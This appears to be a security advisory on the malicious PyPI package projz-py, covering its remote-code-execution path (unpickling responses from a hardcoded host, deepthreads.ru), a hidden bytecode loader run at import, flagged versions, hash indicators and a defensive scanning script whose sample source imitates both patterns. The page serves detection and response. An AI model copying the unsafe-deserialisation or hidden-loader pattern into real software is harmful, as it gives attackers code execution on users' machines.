Malicious package: projz-py (PyPI)

Malicious code in projz-py (PyPI). Remove it immediately and rotate any exposed credentials.

MAL-2026-3696
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
pip uninstall projz-py

What this malware does

The package routes authentication-related calls through a hardcoded third-party HTTP endpoint and then unpickles the server's raw response, a textbook unauthenticated remote-code-execution primitive against the installing Python process. Specifically, projz/api/control/rpc.py sets RPC_SERVER = 'http://deepthreads.ru' (plain HTTP) and implements _rpc as pickle.dumps(args) → session.post(...) → pickle.loads(response.read()). This path is reached from projz/api/request_manager.py (build_headers calls provider.generate_request_signature) and from projz/client.py during registration (RPC.generate_smid), so normal, documented use of the library drives pickle.loads on attacker-influenceable bytes. Anyone who controls that domain, or holds any network position on the plain-HTTP path, can execute arbitrary code in the process that imported projz.

Compounding the risk, projz/api/secret/init.py opens a sibling secret.pyc, skips the 16-byte header, marshal.loads the code object and exec()s it at import time into a synthetic secret_functions module. headers_provider.py imports this at the top of the import graph, so the hidden bytecode runs on import projz. The .pyc is not present in the sdist, which defeats source review of the code that actually builds request signatures and device IDs.

The Termux-gated pkg install sox -y in setup.py (install-time mutation of system package state, conditional on an environment marker) is a minor additional concern but is not the basis for this verdict.

Malicious versions

4 flagged versions:

  • 1.7.1
  • 1.8.2
  • 2.3.5
  • 2.3.9

Indicators of compromise (SHA-256)

196ea7ee7277857a29c8478e6908961bde9f28aa136c3e6ae68412ba4b67bff0
c6b4243d00f36ad5ef1dfd6108ad281f84cf758795a7b58b339dab487de0e661
e3af2879058f056f670c860cfea1c319c21b56c32cc327a0fff72c2ad7fba7da
97f64abaec3c77f1cd6e406dc96a033001e271d486dfc97514e88350e9ed695f
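As an added defender-side check for this advisory (example code written for this page, not O3 Security's tooling or the projz-py project's own code), the script below does three things a responder would want after reading the description above: it flags requirement pins that match the four flagged versions, it compares the SHA-256 of a downloaded artifact against the published IoCs, and it statically scans Python source for the two primitives the advisory describes, pickle/marshal load calls fed directly from a .read() on a response or file object. The version numbers and hashes are the ones published above; the requirements listing and source snippet are constructed for the demo and are only parsed, never executed. The static scan is a heuristic (it recognises only `module.loads(x.read())`-shaped calls), so treat its output as a triage hint, not a verdict.

```python
from __future__ import annotations

import ast
import hashlib
import re

# Values published in the advisory above.
FLAGGED_VERSIONS = {"1.7.1", "1.8.2", "2.3.5", "2.3.9"}
IOC_SHA256 = {
    "196ea7ee7277857a29c8478e6908961bde9f28aa136c3e6ae68412ba4b67bff0",
    "c6b4243d00f36ad5ef1dfd6108ad281f84cf758795a7b58b339dab487de0e661",
    "e3af2879058f056f670c860cfea1c319c21b56c32cc327a0fff72c2ad7fba7da",
    "97f64abaec3c77f1cd6e406dc96a033001e271d486dfc97514e88350e9ed695f",
}
# Deserialisers that run attacker-controlled code when fed untrusted bytes.
UNSAFE_LOADERS = {("pickle", "loads"), ("pickle", "load"),
                  ("marshal", "loads"), ("marshal", "load")}
# Matches "projz-py==X" / "projz_py==X" lines from requirements.txt or pip freeze.
PIN_RE = re.compile(r"^\s*projz[-_]py\s*==\s*([0-9][^\s;#]*)", re.IGNORECASE)


def flagged_pins(requirements_text: str) -> list[str]:
    """Return every flagged projz-py version pinned in a requirements listing."""
    hits = []
    for line in requirements_text.splitlines():
        m = PIN_RE.match(line)
        if m and m.group(1) in FLAGGED_VERSIONS:
            hits.append(m.group(1))
    return hits


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_ioc(data: bytes) -> bool:
    """True if an artifact (wheel/sdist bytes) hashes to a published IoC."""
    return sha256_hex(data) in IOC_SHA256


def unsafe_loads(source: str) -> list[tuple[int, str, bool]]:
    """Find pickle/marshal load calls in Python source.

    Returns (line, "module.func", fed_from_read) sorted by line. fed_from_read
    is True when the first argument is a .read() call, i.e. the bytes come
    straight from a response or file object, the shape of the _rpc and
    secret.pyc paths the advisory describes.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        f = node.func
        if not (isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name)):
            continue
        key = (f.value.id, f.attr)
        if key not in UNSAFE_LOADERS:
            continue
        arg = node.args[0] if node.args else None
        fed_from_read = (isinstance(arg, ast.Call)
                         and isinstance(arg.func, ast.Attribute)
                         and arg.func.attr == "read")
        findings.append((node.lineno, f"{key[0]}.{key[1]}", fed_from_read))
    return sorted(findings)


# Constructed inputs for the demo: they imitate the shape described in the
# advisory and are parsed only, never executed.
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
projz-py==2.3.5
numpy==1.26.0
"""

SAMPLE_SOURCE = '''\
import pickle, marshal
def _rpc(session, args):
    resp = session.post("http://rpc.invalid", data=pickle.dumps(args))
    return pickle.loads(resp.read())      # server-controlled bytes -> code execution
def load_hidden(path):
    with open(path, "rb") as fh:
        fh.read(16)                       # skip the .pyc header
        return marshal.loads(fh.read())   # hidden bytecode object
'''

if __name__ == "__main__":
    print("flagged pins:", flagged_pins(SAMPLE_REQUIREMENTS))
    print("sample bytes match IoC:", matches_ioc(b"not a real artifact"))
    for line, call, from_read in unsafe_loads(SAMPLE_SOURCE):
        print(f"line {line}: {call}({'.read() data' if from_read else '...'})")
```

In practice you would feed `flagged_pins` the output of `pip freeze` from each environment, `matches_ioc` the bytes of any cached projz-py wheel or sdist under pip's cache, and `unsafe_loads` the contents of every .py file in the installed package; a hit on the last check on a file that also writes into `sys.modules` is exactly the secret_functions pattern described above.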

Frequently asked questions

No. projz-py on PyPI has been identified as a malicious package (versions 1.7.1, 1.8.2, 2.3.5, 2.3.9 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

  • IN-MAL-2026-002327
  • IN-MAL-2026-002328
  • IN-MAL-2026-002341
  • IN-MAL-2026-002326

References

Credits

  • Amazon Inspector · finder

projz-py (PyPI) malicious package — MAL-2026-3696 | O3 Security